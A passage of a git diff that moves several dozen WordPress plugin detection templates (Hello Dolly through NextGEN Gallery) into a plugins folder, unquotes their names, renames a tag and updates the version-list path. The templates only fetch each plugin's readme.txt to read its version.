wordpress-health-check.txt + last_version: helpers/wordpress/plugins/health-check.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-hello-dolly.yaml b/technologies/wordpress/plugins/hello-dolly.yaml similarity index 87% rename from technologies/wordpress/wordpress-hello-dolly.yaml rename to technologies/wordpress/plugins/hello-dolly.yaml index d5cd8e3650..fd5f115e99 100644 --- a/technologies/wordpress/wordpress-hello-dolly.yaml +++ b/technologies/wordpress/plugins/hello-dolly.yaml @@ -1,7 +1,7 @@ id: wordpress-hello-dolly info: - name: "Hello Dolly Detection" + name: Hello Dolly Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" payloads: - last_version: wordpress-hello-dolly.txt + last_version: helpers/wordpress/plugins/hello-dolly.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-imagify.yaml b/technologies/wordpress/plugins/imagify.yaml similarity index 83% rename from technologies/wordpress/wordpress-imagify.yaml rename to technologies/wordpress/plugins/imagify.yaml index 1c0ce29feb..b782ca21d3 100644 --- a/technologies/wordpress/wordpress-imagify.yaml +++ b/technologies/wordpress/plugins/imagify.yaml @@ -1,7 +1,7 @@ id: wordpress-imagify info: - name: "Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection" + name: Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" payloads: - last_version: wordpress-imagify.txt + last_version: helpers/wordpress/plugins/imagify.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-imsanity.yaml b/technologies/wordpress/plugins/imsanity.yaml similarity index 88% rename from technologies/wordpress/wordpress-imsanity.yaml rename to technologies/wordpress/plugins/imsanity.yaml index e991ab5c3e..1c0370f2a0 100644 --- a/technologies/wordpress/wordpress-imsanity.yaml +++ b/technologies/wordpress/plugins/imsanity.yaml @@ -1,7 +1,7 @@ id: wordpress-imsanity info: - name: "Imsanity Detection" + name: Imsanity Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" payloads: - last_version: wordpress-imsanity.txt + last_version: helpers/wordpress/plugins/imsanity.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml b/technologies/wordpress/plugins/insert-headers-and-footers.yaml similarity index 82% rename from technologies/wordpress/wordpress-insert-headers-and-footers.yaml rename to technologies/wordpress/plugins/insert-headers-and-footers.yaml index f7d800a21c..cb4e854f2e 100644 --- a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml +++ b/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -1,7 +1,7 @@ id: wordpress-insert-headers-and-footers info: - name: "WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager Detection" + name: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" payloads: - last_version: wordpress-insert-headers-and-footers.txt + last_version: helpers/wordpress/plugins/insert-headers-and-footers.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-instagram-feed.yaml b/technologies/wordpress/plugins/instagram-feed.yaml similarity index 86% rename from technologies/wordpress/wordpress-instagram-feed.yaml rename to technologies/wordpress/plugins/instagram-feed.yaml index 2fa523b4a6..920aa9e46a 100644 --- a/technologies/wordpress/wordpress-instagram-feed.yaml +++ b/technologies/wordpress/plugins/instagram-feed.yaml @@ -1,7 +1,7 @@ id: wordpress-instagram-feed info: - name: "Smash Balloon Social Photo Feed Detection" + name: Smash Balloon Social Photo Feed Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" payloads: - last_version: wordpress-instagram-feed.txt + last_version: helpers/wordpress/plugins/instagram-feed.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml b/technologies/wordpress/plugins/intuitive-custom-post-order.yaml similarity index 86% rename from technologies/wordpress/wordpress-intuitive-custom-post-order.yaml rename to technologies/wordpress/plugins/intuitive-custom-post-order.yaml index e3d6ef65d5..30177dd952 100644 --- a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml +++ b/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -1,7 +1,7 @@ id: wordpress-intuitive-custom-post-order info: - name: "Intuitive Custom Post Order Detection" + name: Intuitive Custom Post Order Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" payloads: - last_version: wordpress-intuitive-custom-post-order.txt + last_version: helpers/wordpress/plugins/intuitive-custom-post-order.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-iwp-client.yaml b/technologies/wordpress/plugins/iwp-client.yaml similarity index 87% rename from technologies/wordpress/wordpress-iwp-client.yaml rename to technologies/wordpress/plugins/iwp-client.yaml index c0a6180267..f632f9cadb 100644 --- a/technologies/wordpress/wordpress-iwp-client.yaml +++ b/technologies/wordpress/plugins/iwp-client.yaml @@ -1,7 +1,7 @@ id: wordpress-iwp-client info: - name: "InfiniteWP Client Detection" + name: InfiniteWP Client Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" payloads: - last_version: wordpress-iwp-client.txt + last_version: helpers/wordpress/plugins/iwp-client.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-jetpack.yaml b/technologies/wordpress/plugins/jetpack.yaml similarity index 85% rename from technologies/wordpress/wordpress-jetpack.yaml rename to technologies/wordpress/plugins/jetpack.yaml index f4fcffaf2b..d1e8fc83d0 100644 --- a/technologies/wordpress/wordpress-jetpack.yaml +++ b/technologies/wordpress/plugins/jetpack.yaml @@ -1,7 +1,7 @@ id: wordpress-jetpack info: - name: "Jetpack – WP Security, Backup, Speed, & Growth Detection" + name: Jetpack – WP Security, Backup, Speed, & Growth Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" payloads: - last_version: wordpress-jetpack.txt + last_version: helpers/wordpress/plugins/jetpack.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-kadence-blocks.yaml b/technologies/wordpress/plugins/kadence-blocks.yaml similarity index 84% rename from technologies/wordpress/wordpress-kadence-blocks.yaml rename to technologies/wordpress/plugins/kadence-blocks.yaml index 0235308e48..98a944477e 100644 --- a/technologies/wordpress/wordpress-kadence-blocks.yaml +++ b/technologies/wordpress/plugins/kadence-blocks.yaml @@ -1,7 +1,7 @@ id: wordpress-kadence-blocks info: - name: "Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection" + name: Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" payloads: - last_version: wordpress-kadence-blocks.txt + last_version: helpers/wordpress/plugins/kadence-blocks.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-kirki.yaml b/technologies/wordpress/plugins/kirki.yaml similarity index 87% rename from technologies/wordpress/wordpress-kirki.yaml rename to technologies/wordpress/plugins/kirki.yaml index 4e28a92443..6657dbe169 100644 --- a/technologies/wordpress/wordpress-kirki.yaml +++ b/technologies/wordpress/plugins/kirki.yaml @@ -1,7 +1,7 @@ id: wordpress-kirki info: - name: "Kirki Customizer Framework Detection" + name: Kirki Customizer Framework Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" payloads: - last_version: wordpress-kirki.txt + last_version: helpers/wordpress/plugins/kirki.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-leadin.yaml b/technologies/wordpress/plugins/leadin.yaml similarity index 84% rename from technologies/wordpress/wordpress-leadin.yaml rename to technologies/wordpress/plugins/leadin.yaml index 034fdd9218..077e40d35c 100644 --- a/technologies/wordpress/wordpress-leadin.yaml +++ b/technologies/wordpress/plugins/leadin.yaml @@ -1,7 +1,7 @@ id: wordpress-leadin info: - name: "HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics Detection" + name: HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" payloads: - last_version: wordpress-leadin.txt + last_version: helpers/wordpress/plugins/leadin.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml b/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml similarity index 86% rename from technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml rename to technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 8e6cf71dd5..8c0103e397 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml +++ b/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -1,7 +1,7 @@ id: wordpress-limit-login-attempts-reloaded info: - name: "Limit Login Attempts Reloaded Detection" + name: Limit Login Attempts Reloaded Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" payloads: - last_version: wordpress-limit-login-attempts-reloaded.txt + last_version: helpers/wordpress/plugins/limit-login-attempts-reloaded.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-limit-login-attempts.yaml b/technologies/wordpress/plugins/limit-login-attempts.yaml similarity index 86% rename from technologies/wordpress/wordpress-limit-login-attempts.yaml rename to technologies/wordpress/plugins/limit-login-attempts.yaml index 1edf58af97..fb7ed2b866 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts.yaml +++ b/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -1,7 +1,7 @@ id: wordpress-limit-login-attempts info: - name: "Limit Login Attempts Detection" + name: Limit Login Attempts Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" payloads: - last_version: wordpress-limit-login-attempts.txt + last_version: helpers/wordpress/plugins/limit-login-attempts.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-litespeed-cache.yaml b/technologies/wordpress/plugins/litespeed-cache.yaml similarity index 87% rename from technologies/wordpress/wordpress-litespeed-cache.yaml rename to technologies/wordpress/plugins/litespeed-cache.yaml index 3a85119635..72fa8d3734 100644 --- a/technologies/wordpress/wordpress-litespeed-cache.yaml +++ b/technologies/wordpress/plugins/litespeed-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-litespeed-cache info: - name: "LiteSpeed Cache Detection" + name: LiteSpeed Cache Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" payloads: - last_version: wordpress-litespeed-cache.txt + last_version: helpers/wordpress/plugins/litespeed-cache.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-loco-translate.yaml b/technologies/wordpress/plugins/loco-translate.yaml similarity index 87% rename from technologies/wordpress/wordpress-loco-translate.yaml rename to technologies/wordpress/plugins/loco-translate.yaml index b44fd34923..37b638b1d4 100644 --- a/technologies/wordpress/wordpress-loco-translate.yaml +++ b/technologies/wordpress/plugins/loco-translate.yaml @@ -1,7 +1,7 @@ id: wordpress-loco-translate info: - name: "Loco Translate Detection" + name: Loco Translate Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" payloads: - last_version: wordpress-loco-translate.txt + last_version: helpers/wordpress/plugins/loco-translate.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-loginizer.yaml b/technologies/wordpress/plugins/loginizer.yaml similarity index 87% rename from technologies/wordpress/wordpress-loginizer.yaml rename to technologies/wordpress/plugins/loginizer.yaml index 8a75e7a194..1d7a9e15a6 100644 --- a/technologies/wordpress/wordpress-loginizer.yaml +++ b/technologies/wordpress/plugins/loginizer.yaml @@ -1,7 +1,7 @@ id: wordpress-loginizer info: - name: "Loginizer Detection" + name: Loginizer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" payloads: - last_version: wordpress-loginizer.txt + last_version: helpers/wordpress/plugins/loginizer.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-loginpress.yaml b/technologies/wordpress/plugins/loginpress.yaml similarity index 86% rename from technologies/wordpress/wordpress-loginpress.yaml rename to technologies/wordpress/plugins/loginpress.yaml index 2b0c8138e6..1cc04d84c4 100644 --- a/technologies/wordpress/wordpress-loginpress.yaml +++ b/technologies/wordpress/plugins/loginpress.yaml @@ -1,7 +1,7 @@ id: wordpress-loginpress info: - name: "LoginPress | Custom Login Page Customizer Detection" + name: LoginPress | Custom Login Page Customizer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" payloads: - last_version: wordpress-loginpress.txt + last_version: helpers/wordpress/plugins/loginpress.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml b/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml similarity index 87% rename from technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml rename to technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 0f13fa172f..2fd48d4e67 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml +++ b/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-mailchimp-for-woocommerce info: - name: "Mailchimp for WooCommerce Detection" + name: Mailchimp for WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" payloads: - last_version: wordpress-mailchimp-for-woocommerce.txt + last_version: helpers/wordpress/plugins/mailchimp-for-woocommerce.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml b/technologies/wordpress/plugins/mailchimp-for-wp.yaml similarity index 86% rename from technologies/wordpress/wordpress-mailchimp-for-wp.yaml rename to technologies/wordpress/plugins/mailchimp-for-wp.yaml index a802c96145..45f5ee4ddf 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml +++ b/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -1,7 +1,7 @@ id: wordpress-mailchimp-for-wp info: - name: "MC4WP: Mailchimp for WordPress Detection" + name: MC4WP' Mailchimp for WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" payloads: - last_version: wordpress-mailchimp-for-wp.txt + last_version: helpers/wordpress/plugins/mailchimp-for-wp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-mailpoet.yaml b/technologies/wordpress/plugins/mailpoet.yaml similarity index 85% rename from technologies/wordpress/wordpress-mailpoet.yaml rename to technologies/wordpress/plugins/mailpoet.yaml index e1752359ee..cec7c07865 100644 --- a/technologies/wordpress/wordpress-mailpoet.yaml +++ b/technologies/wordpress/plugins/mailpoet.yaml @@ -1,7 +1,7 @@ id: wordpress-mailpoet info: - name: "MailPoet – emails and newsletters in WordPress Detection" + name: MailPoet – emails and newsletters in WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" payloads: - last_version: wordpress-mailpoet.txt + last_version: helpers/wordpress/plugins/mailpoet.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-maintenance.yaml b/technologies/wordpress/plugins/maintenance.yaml similarity index 87% rename from technologies/wordpress/wordpress-maintenance.yaml rename to technologies/wordpress/plugins/maintenance.yaml index 461392faf2..00293c8abe 100644 --- a/technologies/wordpress/wordpress-maintenance.yaml +++ b/technologies/wordpress/plugins/maintenance.yaml @@ -1,7 +1,7 @@ id: wordpress-maintenance info: - name: "Maintenance Detection" + name: Maintenance Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" payloads: - last_version: wordpress-maintenance.txt + last_version: helpers/wordpress/plugins/maintenance.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-mainwp-child.yaml b/technologies/wordpress/plugins/mainwp-child.yaml similarity index 83% rename from technologies/wordpress/wordpress-mainwp-child.yaml rename to technologies/wordpress/plugins/mainwp-child.yaml index 48f63e948b..db0812bdc1 100644 --- a/technologies/wordpress/wordpress-mainwp-child.yaml +++ b/technologies/wordpress/plugins/mainwp-child.yaml @@ -1,7 +1,7 @@ id: wordpress-mainwp-child info: - name: "MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection" + name: MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" payloads: - last_version: wordpress-mainwp-child.txt + last_version: helpers/wordpress/plugins/mainwp-child.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-malcare-security.yaml b/technologies/wordpress/plugins/malcare-security.yaml similarity index 83% rename from technologies/wordpress/wordpress-malcare-security.yaml rename to technologies/wordpress/plugins/malcare-security.yaml index 88a3dfcc6e..fa291f6d88 100644 --- a/technologies/wordpress/wordpress-malcare-security.yaml +++ b/technologies/wordpress/plugins/malcare-security.yaml @@ -1,7 +1,7 @@ id: wordpress-malcare-security info: - name: "MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall Detection" + name: MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" payloads: - last_version: wordpress-malcare-security.txt + last_version: helpers/wordpress/plugins/malcare-security.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-megamenu.yaml b/technologies/wordpress/plugins/megamenu.yaml similarity index 88% rename from technologies/wordpress/wordpress-megamenu.yaml rename to technologies/wordpress/plugins/megamenu.yaml index c5bcb88555..77031d6138 100644 --- a/technologies/wordpress/wordpress-megamenu.yaml +++ b/technologies/wordpress/plugins/megamenu.yaml @@ -1,7 +1,7 @@ id: wordpress-megamenu info: - name: "Max Mega Menu Detection" + name: Max Mega Menu Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" payloads: - last_version: wordpress-megamenu.txt + last_version: helpers/wordpress/plugins/megamenu.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-members.yaml b/technologies/wordpress/plugins/members.yaml similarity index 85% rename from technologies/wordpress/wordpress-members.yaml rename to technologies/wordpress/plugins/members.yaml index e03f0c27b2..06dd39dc7d 100644 --- a/technologies/wordpress/wordpress-members.yaml +++ b/technologies/wordpress/plugins/members.yaml @@ -1,7 +1,7 @@ id: wordpress-members info: - name: "Members – Membership & User Role Editor Plugin Detection" + name: Members – Membership & User Role Editor Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: members wpscan: https://wpscan.com/plugin/members - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" payloads: - last_version: wordpress-members.txt + last_version: helpers/wordpress/plugins/members.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-meta-box.yaml b/technologies/wordpress/plugins/meta-box.yaml similarity index 85% rename from technologies/wordpress/wordpress-meta-box.yaml rename to technologies/wordpress/plugins/meta-box.yaml index a57abbca8e..8c96f3c9eb 100644 --- a/technologies/wordpress/wordpress-meta-box.yaml +++ b/technologies/wordpress/plugins/meta-box.yaml @@ -1,7 +1,7 @@ id: wordpress-meta-box info: - name: "Meta Box – WordPress Custom Fields Framework Detection" + name: Meta Box – WordPress Custom Fields Framework Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" payloads: - last_version: wordpress-meta-box.txt + last_version: helpers/wordpress/plugins/meta-box.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ml-slider.yaml b/technologies/wordpress/plugins/ml-slider.yaml similarity index 83% rename from technologies/wordpress/wordpress-ml-slider.yaml rename to technologies/wordpress/plugins/ml-slider.yaml index 081128a963..b077126af2 100644 --- a/technologies/wordpress/wordpress-ml-slider.yaml +++ b/technologies/wordpress/plugins/ml-slider.yaml @@ -1,7 +1,7 @@ id: wordpress-ml-slider info: - name: "Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Plugin Detection" + name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" payloads: - last_version: wordpress-ml-slider.txt + last_version: helpers/wordpress/plugins/ml-slider.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-newsletter.yaml b/technologies/wordpress/plugins/newsletter.yaml similarity index 85% rename from technologies/wordpress/wordpress-newsletter.yaml rename to technologies/wordpress/plugins/newsletter.yaml index e1eba4979e..ec2dd64e53 100644 --- a/technologies/wordpress/wordpress-newsletter.yaml +++ b/technologies/wordpress/plugins/newsletter.yaml @@ -1,7 +1,7 @@ id: wordpress-newsletter info: - name: "Newsletter – Send awesome emails from WordPress Detection" + name: Newsletter – Send awesome emails from WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" payloads: - last_version: wordpress-newsletter.txt + last_version: helpers/wordpress/plugins/newsletter.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml b/technologies/wordpress/plugins/nextend-facebook-connect.yaml similarity index 86% rename from technologies/wordpress/wordpress-nextend-facebook-connect.yaml rename to technologies/wordpress/plugins/nextend-facebook-connect.yaml index a8f7176000..ef17fe5662 100644 --- a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml +++ b/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -1,7 +1,7 @@ id: wordpress-nextend-facebook-connect info: - name: "Nextend Social Login and Register Detection" + name: Nextend Social Login and Register Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" payloads: - last_version: wordpress-nextend-facebook-connect.txt + last_version: helpers/wordpress/plugins/nextend-facebook-connect.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-nextgen-gallery.yaml b/technologies/wordpress/plugins/nextgen-gallery.yaml similarity index 85% rename from technologies/wordpress/wordpress-nextgen-gallery.yaml rename to 